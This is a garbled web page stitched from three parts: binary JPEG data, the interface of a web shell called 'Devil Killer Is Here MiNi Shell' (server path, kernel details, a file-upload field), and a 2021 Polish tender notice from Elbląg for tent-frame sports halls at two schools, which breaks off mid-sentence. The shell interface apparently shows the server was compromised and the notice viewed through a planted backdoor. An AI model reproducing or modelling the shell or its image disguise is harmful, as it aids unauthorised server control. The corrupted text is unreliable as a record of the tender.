JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210728/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210728/0012977401-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00129774 z dnia 2021-07-28</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa hal o konstrukcji namiotowo - szkieletowej przekrywającej boisko wielofunkcyjne (cała nazwa zamówienia w pkt 4.2.2) dla Części I i II) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIASTO ELBLĄG NA PRAWACH POWIATU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 170747715</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Łączności 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Elbląg</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">552393125</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp@umelblag.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">elblag.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> administracja samorządowa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa hal o konstrukcji namiotowo - szkieletowej przekrywającej boisko wielofunkcyjne (cała nazwa zamówienia w pkt 4.2.2) dla Części I i II) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7525b75a-e86c-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00129774</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002308/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 Przebudowa boisk przy Szkole Podstawowej nr 21 przy ul. Godlewskiego 1 w Elblągu</p> <p class="mb-0">1.1.10 Przebudowa boisk przy Szkole Podstawowej Nr 18 przy ul. Węgrowskiej 1 w Elblągu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/; http://um-elblag.samorzady.pl/kat/id/57 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu,<br/>który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem:<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej dzp@umelblag.pl.Wykonawca składa ofertę<br/>za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na<br/>ePUAP (na adres Elektronicznej Skrzynki Podawczej (ESP) URZĘDU MIEJSKIEGO W ELBLĄGU<br/>974x3yyiku/SkrytkaESP) i udostępnionego również na miniPortalu. W postępowaniu o udzielenie<br/>zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie<br/>oświadczeń, wniosków (innych niż składane wraz z ofertą), zawiadomień oraz przekazywanie<br/>informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza: „Formularz do<br/>komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal, a także za pomocą poczty<br/>elektronicznej, email dzp@umelblag.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP).Ofertę, oświadczenie, o którym mowa<br/>w art. 125 ust. 1, składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.Forma elektroniczna to postać<br/>elektroniczna opatrzona kwalifikowanym podpisem elektronicznym.Sposób sporządzenia dokumentów<br/>elektronicznych musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady<br/>Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz rozporządzeniu Ministra<br/>Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem Państwa danych osobowych jest Gmina<br/>Miasto Elbląg z siedzibą przy ul. Łączności 1, 82-300 Elbląg, reprezentowana przez: Prezydenta<br/>Miasta Elbląg.1) Administrator wyznaczył Inspektora Ochrony Danych,kontakt: tel. 55 239 33 28, email:<br/>iod@umelblag.pl 2) Dane osobowe przetwarzane będą w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego DZP.271.48.2021.AD „Budowa hal o konstrukcji namiotowo -<br/>szkieletowej przekrywającej boisko wielofunkcyjne w ramach zadań: Część I: "Przebudowa boisk przy<br/>Szkole Podstawowej nr 18 przy ul. Węgrowskiej 1 w Elblągu", Część II: "Przebudowa boisk przy Szkole<br/>Podstawowej nr 21 przy ul. Godlewskiego 1 w Elblągu”, prowadzonym w trybie podstawowym, na<br/>podstawie ustawy Pzp.3) Dane osobowe mogą być przekazywane wyłącznie podmiotom uprawnionym<br/>na podstawie przepisów prawa, między innymi Krajowej Izbie Odwoławczej w ramach prowadzenia<br/>postępowania odwoławczego. 4) Dane osobowe przechowywane są przez okres niezbędny do<br/>realizacji wskazanych w pkt. 2 celów, a po tym czasie przez okres oraz w zakresie wymaganym przez<br/>przepisy prawa.5) Podanie danych osobowych jest wymogiem ustawowym, wynika z realizacji<br/>obowiązków wynikających z przepisów prawa, tj. ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego.6) Posiadają Państwo prawo do:- dostępu do treści swoich<br/>danych, ich sprostowania, ograniczenia przetwarzania*- złożenia skargi do organu nadzorczego:<br/>Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.* Wyjaśnienie:<br/>skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie<br/>niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego<br/>załączników.Żądanie ograniczenia przetwarzania, nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia tego postępowania.Zamawiający dodatkowo informuje, że: 1. Wykonawca<br/>ubiegając się o udzielenie zamówienia publicznego jest zobowiązany do wypełnienia wszystkich<br/>obowiązków formalno-prawnych związanych z udziałem w postępowaniu. Do obowiązków tych należą<br/>m.in. obowiązki wynikające z RODO, w szczególności obowiązek informacyjny przewidziany w art. 13<br/>RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te wykonawca<br/>bezpośrednio pozyskał. Jednakże obowiązek informacyjny wynikający z art. 13 RODO nie będzie miał<br/>zastosowania, gdy i w zakresie, w jakim osoba fizyczna, której dane dotyczą, dysponuje już tymi<br/>informacjami (vide: art. 13 ust. 4).2. Wykonawca będzie musiał wypełnić obowiązek informacyjny<br/>wynikający z art. 14 RODO względem osób fizycznych, których dane przekazuje Zamawiającemu i<br/>których dane pośrednio pozyskał, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których<br/>mowa w art. 14 ust. 5 RODO. W związku z powyższym Zamawiający oczekuje, że Wykonawca złoży<br/>oświadczenie o treści:„Oświadczamy, że wypełniliśmy obowiązki informacyjne przewidziane w art. 13<br/>lub art. 14 RODO wobec osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio<br/>pozyskaliśmy w celu ubiegania się o udzielenie zamówienia publicznego w niniejszym<br/>postępowaniu.”(Wykonawca nie musi składać ww. oświadczenia w przypadku gdy nie przekazuje<br/>danych osobowych innych niż bezpośrednio jego dotyczących lub zachodzi wyłączenie stosowania<br/>obowiązku informacyjnego, stosownie do art. 13 ust. 4 lub art. 14 ust. 5 RODO).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZP.271.48.2021.AD</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Budowa hal o konstrukcji namiotowo - szkieletowej przekrywającej boisko wielofunkcyjne w<br/>ramach zadań: Część I: "Przebudowa boisk przy Szkole Podstawowej nr 18 przy ul.<br/>Węgrowskiej 1 w Elblągu", Część II: "Przebudowa boisk przy Szkole Podstawowej nr 21 przy ul.<br/>Godlewskiego 1 w Elblągu”Przedmiotem zamówienia Części I jest realizacja II etapu inwestycji<br/>polegającej na budowie hali o konstrukcji namiotowo – szkieletowej przekrywającej boisko<br/>poliuretanowe wykonane w 2020 r., budowie łącznika pomiędzy budynkiem głównym szkoły a<br/>halą, budowie budynku węzła ciepłowniczego.Zamawiający planuje, że zadania inwestycyjne<br/>będą dofinansowane ze środków Ministerstwa Kultury, Dziedzictwa Narodowego i Sportu w<br/>ramach Programu Rozwoju Lokalnej Infrastruktury Sportowej – Edycja 2021.Zakres Części I<br/>obejmuje: Budowę hali o konstrukcji namiotowo – szkieletowej przekrywającej boisko<br/>wielofunkcyjne w ramach zadania: „Przebudowa boisk przy Szkole Podstawowej Nr 18 przy ul.<br/>w Elblągu”, w tym:a) demontaż piłkochwytów i ponowny montaż na terenie szkoły,b) budowę hali<br/>przekrywającej boisko o wymiarach zewnętrznych 24,33 m x 44,36 m,c) budowę łącznika<br/>pomiędzy budynkiem głównym szkoły a halą o wymiarach zewnętrznych 7,65 m x 4,80 m,d)<br/>budowę budynku węzła ciepłowniczego,e) wykonanie robót sanitarnych, w tym:- przyłącza<br/>kanalizacji deszczowej, kanalizacji sanitarnej, wodociągowego,- instalacji hydrantowej,- instalacji<br/>zewnętrznych: kanalizacji deszczowej, kanalizacji sanitarnej, - instalacji wewnętrznych: instalacji<br/>c.o., instalacji zimnej wody, kanalizacji sanitarnej, wentylacji,f) wykonanie robót elektrycznych, w<br/>tym:- przyłącza elektroenergetycznego - złącza ZKP, - tablic rozdzielczych,- instalacji<br/>wewnętrznych: instalacji oświetleniowej, oświetlenia awaryjnego, instalacji odbiorczej zasilającej<br/>nagrzewnice wodne oraz dmuchawy elektryczne, instalacji uziemiającej, ochronę od porażeń<br/>prądem elektrycznym oraz głównego wyłącznika prądu w TG i RWC,g) budowę bieżni prostej<br/>wraz ze skocznią,h) budowę chodnika i elementów utwardzonych,i) wykonanie ogrodzenia<br/>panelowego terenu hali,j) dostawę i montaż odbojnic na słupy znajdujące się na terenie<br/>boiska,k) wykonanie i zamontowanie tablicy informacyjnej Ministerstwa Kultury, Dziedzictwa<br/>Narodowego i Sportu zgodnie z Programem Rozwoju Lokalnej Infrastruktury Sportowej - tablica<br/>informacyjna musi zawierać: barwy Rzeczypospolitej Polskiej i wizerunek godła Rzeczypospolitej<br/>Polskiej, tytuł programu, źródła finansowania oraz tytuł inwestycji. Wzór tablicy dostępny pod<br/>linkiem: https://www.gov.pl/web/premier/promocja - musi być umieszczona w widocznym<br/>miejscu, wykonana z materiałów odpornych na wpływ czynników atmosferycznych.Zamawiający<br/>posiada decyzję o pozwoleniu na budowę znak DUA-A.6740.1.88.2018.KB, nr 88/2018 z dnia<br/>27.03.2018 r. wydaną przez Prezydenta Miasta Elbląg.Zamawiający informuje, że zakres robót nie obejmuje wykonania boiska poliuretanowego, piłkochwytów, ław fundamentowych hali.<br/>Roboty te zostały wykonane w 2020 r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45212225-9 - Roboty budowlane związane z halami sportowymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt społeczny</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia Części II jest realizacja II etapu inwestycji polegającej na budowie hali<br/>o konstrukcji namiotowo – szkieletowej przekrywającej boisko poliuretanowe wykonane w 2020<br/>r. oraz budowa budynku węzła sanitarno-szatniowego.<br/>Zamawiający planuje, że zadania inwestycyjne będą dofinansowane ze środków Ministerstwa<br/>Kultury, Dziedzictwa Narodowego i Sportu w ramach Programu Rozwoju Lokalnej Infrastruktury<br/>Sportowej – Edycja 2021.<br/>Zakres Części II obejmuje:<br/>Budowę hali o konstrukcji namiotowo – szkieletowej przekrywającej boisko wielofunkcyjne w<br/>ramach zadania: „Przebudowa boisk przy Szkole Podstawowej Nr 21 przy ul. Godlewskiego 1 w<br/>Elblągu”, w tym:<br/>a) demontaż piłkochwytów i ponowny montaż w miejscu wskazanym przez Zamawiającego,<br/>b) budowę hali przekrywającej boisko o wymiarach zewnętrznych 24,33 m x 44,36 m,<br/>c) budowę węzła sanitarno-szatniowego o wymiarach zewnętrznych 14,70 x 13,16 m,<br/>d) wykonanie robót sanitarnych, w tym:<br/>- przyłącza kanalizacji deszczowej, kanalizacji sanitarnej, wodociągowego<br/>- instalacji hydrantowej,<br/>- instalacji zewnętrznych: kanalizacji deszczowej, kanalizacji sanitarnej,<br/>- instalacji wewnętrznych: instalacji c.o., instalacji zimnej i ciepłej wody, kanalizacji sanitarnej,<br/>wentylacji mechanicznej,<br/>e) wykonanie robót elektrycznych, w tym:<br/>- przyłącza elektroenergetycznego - złącza ZKP,<br/>- instalacji wewnętrznych: instalacji oświetleniowej, oświetlenia awaryjnego, instalacji odbiorczej<br/>zasilającej nagrzewnice wodne oraz dmuchawy elektryczne, instalacji uziemiającej, ochronę od<br/>porażeń prądem elektrycznym oraz głównego wyłącznika prądu w TG i RWC.<br/>f) wykonanie ogrodzenia panelowego terenu hali, g) budowę chodnika i elementów utwardzonych,<br/>h) dostawę i montaż odbojnic na słupy znajdujące się na terenie boiska,<br/>i) wykonanie i zamontowanie tablicy informacyjnej Ministerstwa Kultury, Dziedzictwa<br/>Narodowego i Sportu zgodnie z Programem Rozwoju Lokalnej Infrastruktury Sportowej;<br/>- tablica informacyjna musi zawierać: barwy Rzeczypospolitej Polskiej i wizerunek godła<br/>Rzeczypospolitej Polskiej, tytuł programu, źródła finansowania oraz tytuł inwestycji. Wzór tablicy<br/>dostępny pod linkiem: https://www.gov.pl/web/premier/promocja<br/>- musi być umieszczona w widocznym miejscu, wykonana z materiałów odpornych<br/>na wpływ czynników atmosferycznych.<br/>Zamawiający posiada decyzję o pozwoleniu na budowę znak DUA-A.6740.1.89.2018.KB, nr<br/>89/2018 z dnia 27.03.2018 r. wydaną przez Prezydenta Miasta Elbląg.<br/>Zamawiający informuje, że zakres robót nie obejmuje wykonania boiska poliuretanowego,<br/>piłkochwytów oraz ław fundamentowych hali. Roboty te zostały wykonane w 2020 r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45212225-9 - Roboty budowlane związane z halami sportowymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt społeczny</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w 